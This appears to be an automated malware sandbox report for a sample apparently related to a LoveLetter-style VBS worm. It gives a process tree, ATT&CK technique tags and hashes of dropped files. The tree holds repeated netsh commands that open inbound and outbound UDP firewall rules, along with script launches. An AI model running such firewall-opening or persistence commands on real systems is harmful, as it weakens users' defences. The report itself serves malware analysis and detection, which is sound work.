C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:228
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2152
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1132
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3572
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2976
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2672
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3684
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3584
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3224
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3312
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:5060
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"2⤵PID:3672
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"2⤵PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4336
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:5100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1664
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}1⤵PID:1464
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,Control_RunDLL C:\Windows\System32\srchadmin.dll ,1⤵PID:2980
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵PID:4668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:4200
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa38a6055 /state1:0x41c64e6d1⤵PID:3976
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Account Manipulation
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD54ef3b165311abe48029443c0a529747f
SHA1ad65cc913ed3805d813bc16337c7f6d2a97b55d9
SHA256c2c563dddc3df7fda0e246d9988718b315a9704335312d5ddfb1768efa1655ff
SHA512696e3deb942e4f6d3980a831668bfd40a8bee586cca3e4ca5a85aeae482af5c8c5ae21e319b4483345c582b7a61d51220c8ccce0072497a8ee53e1e87ac5e99a
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
1KB
MD506749aaa06f6c7945179a4d6987646df
SHA1e9a085d7066b30cb8b3f252e18a430f2651e641c
SHA256f2834fd2d110fae3fc504311522554154af4e9a1bdf96b20836983ce04135b7f
SHA512eba3862fdf9f835398862e511e4acf5f48f4c1f6fa42a96be4012fe968ee2d3b60eb3ee50760d2d0d0c89dfcc1212c5b1dd35fc140069405e39ecba23bb94047
-
Filesize
64B
MD51003ec7951f3cd028cf121961d35d74f
SHA1c4d16f56c324c66b7f190bfc81504741f9583496
SHA256a0c7e18c72dfe1dd512a208cf1ed2db19116aa95e9e7daab8a008365cd445659
SHA512d97505b38b2e556874341d3695ef0473ab86aa4468df5fe999aa64c91bfcb8d5bf80191eb75b3af6cafc7835ac5b648fbb511aeccb5b555eb54f72dcb276fe26
-
Filesize
64B
MD5caf7c8d742be571cc9df52e5fed42eac
SHA16022d6909c68bccce19eeedd6b95b4c74a4eaffb
SHA256907d59c4a1decc4fcdd1a2614e3884392d7c275f82cc900fe742151b9c9be22c
SHA5129e8f1a4c2b44b8222f5a31e750ca8fa7f0a4fa6a961c03c0ba8746bc3a8b5cdf08ee91fbc607876b7b2e9ea52562dd55a92d488e4b352f930a4214d5fec8be4b
-
Filesize
1KB
MD573cfb6b874e580b592e2359c08ee0cad
SHA10d725f149b045d17af78799db668c77665c2c267
SHA2563c1bc34be635363731af91ade6426d1c6753b8fc6beeb77fe2a1d09e9dc2871a
SHA5121c48dcd0f3cbc6199ae511cf965fe3d05447d0d772cc5c97adfb6deac897788738c197533986163567eca714680f3761dfe1de045f4e3a5043d1262405ff1101
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\ef75e738-cfc5-440e-8855-345fafcb16dd.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7B
MD5795fc94569ac1e81adcc0b210d697fac
SHA1f24e96080686bbeda4f7c2e144d30fef0570ca00
SHA256b966109dc05aef186be134969b24baf913df103280a1f9cd34f858d75fe26e2d
SHA512d22e3c8ec7eec35b3b9141bac6940debd08dc28a43cee7f42beacc13564578ad248d662e1b610a8a72462c0b69c4684b1d464b073b720828bafdd528cdd34fdd
-
Filesize
468B
MD5543df538bfe2cdb507cbd92c7e4bc598
SHA1a0f3e8ceffa1ff3b5ad9a1b6c2d65d540f2fb54a
SHA256717585ea06e86f43f028a1235c8232c73e2f6fcf241a1df110b75c465271c5f2
SHA512f8c1d932a1799feb07c5d5e97cb365e03dbf17376b62588e5c1bf5c7a70a3102dca536f081a374aec9e62054880f7239bb25c8ac70cff54d63b12029bc131437
-
Filesize
7B
MD5e210738007a0fdcc9b54fd47cf3d2468
SHA103fc4f6a8f9f665f5fc3d571a82ba0b68c557a3f
SHA256188a22ee45f76b6cd6b45e8e76b22a26ee20cee384a9aec7ce2288df9c12e53a
SHA512334bfec17a44686c834c56351e7f2141391e3369c96abd3540faec1af3ad529dd2baf6fdd868e4754e4788b927ccc597d0a175355f0dd2794fc288d8e53a6c75
-
Filesize
71B
MD53544e4b7ac1418d34061648a9f3e3dc6
SHA130e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce
SHA256db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8
SHA5125d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126
-
Filesize
133B
MD5e1aa6baebddf0aff6c4c5083a20a297e
SHA128815535556ca05f3d7f3d226df8cd5c85fa89c9
SHA256d4a7360c572d83e11868d807b02857f84086abd381ffa2e6aff95a1dda490a9e
SHA51262aeaf0f676f5966b90093397e53288ec7b8ccb08b8b29aa8fe47259b683fe29f945c7425605befaf6bea853ec787cbfb9c8ec27880aa3e10290c9df88d79190
-
Filesize
137B
MD5147a38541c3845f2d0a53b18f738eec1
SHA112775ede4d1765164ff685dfdc9a51d8c66c2400
SHA256d6a767002915d5c756b8b39a9db54fbaa4fbedf75a444ec2db810d9468c47f7b
SHA512a448da5bea8d47caba326bc54722459504e24469e07e5cac501d435465a9aedb6da12cc9a71a8de4d2915e1348715766fa95b7ef077e403f29ccb6c35f879de0
-
Filesize
8B
MD5b94c209cf38063d20d63dc09f2ae873d
SHA196ef8ac562766a5fc3de84096f35bf977a1d1e5f
SHA2560e71573bb7f2805bc0e30cbbe46e36d3982363ecfeb55a3d411e6d43fa6fd591
SHA5122a72533df58ecde49edca2a5f52ebc850188c503e2e7bbe1781d415d2659f1f2d367486010c728a0de5af9c62b275aa2d89474274dcdc7a058c6b871723dfa62
-
Filesize
359B
MD52fdfd20af32c8dc255909ebcd44ed51b
SHA15081d65b5e2001605dd83fc936077eb7f4786724
SHA2560de397da60dd5442348a162261f29d91a93c5b10871d88484813645ada985b57
SHA51265493c00f83a1e5e67bce8297cc546e7b03d2476570d13ba90063813b08eaec0837513093787126beb3dc2c0be54100f6a9f05731ec0a6e664c83f567f8e7d39
-
Filesize
8B
MD58cd502f5bf8dc075d41a0d5be175a3e1
SHA1d4f720a38e935be3e3ce15a427b608ff1f80331d
SHA25637ac4f931651b5deb0a5340d0ee6174fbd606b048ccd6261fe5784c8669d30f4
SHA512877234cc3aed07a6bcac355af1a69a7c0fec7fd751376357cfeac2c1b6360d5349a65f0d427f2eb7defa6370785e262fdd114c7bbb1e6e9453770f1bee480add
-
Filesize
8B
MD5190ee356c0ed5c948cf248dbdd8af6bd
SHA1808ac5f7755bb374cba429217097c47250ba315a
SHA256bef70885d9ff36b8490dde2c214bcf9d5bf4631e9bdf69bea5334f89eb72d773
SHA512365c02f05504597dab4bd4c557d510f64367efcbeadfc19847d35efbf425e39de544d10edd21fab91cced1445b61c3813ac5deca64699d7d246dbd7672a927a8
-
Filesize
495B
MD5900ead69492d80e48738921eca28b14f
SHA16b51607c54f8e734a7ea47091859c3e8dce6365c
SHA256c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
SHA5128fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2
-
Filesize
488B
MD588ef4bc3f48eeb97aedadff8f3840980
SHA148e8167bef2562d902885a075f6190d269fd3d35
SHA256b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
SHA512523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024